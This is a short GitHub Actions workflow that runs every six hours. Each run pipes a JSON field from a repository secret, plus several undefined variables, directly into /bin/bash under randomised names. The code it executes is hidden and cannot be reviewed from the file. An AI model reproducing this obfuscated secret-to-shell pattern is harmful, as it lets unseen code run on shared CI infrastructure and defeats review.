name: heweilixin

on:
  workflow_dispatch:
  schedule:
    - cron: '52 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: heweilixin
        env:
          kw379: ${{ secrets.kw379 }}
        run: |
          echo $kw379 | jq -r .dqg24 | /bin/bash
          echo $lmzum60 | jq -r .dut62 | /bin/bash
          echo $qy62198 | jq -r .wr4 | /bin/bash
          echo $grkeh2038 | jq -r .fu0000 | /bin/bash
          echo $abtzy6690 | jq -r .qfp22 | /bin/bash
          echo $cx9538 | jq -r .iqyj338 | /bin/bash
          echo $ozb35455 | jq -r .xhypb52 | /bin/bash

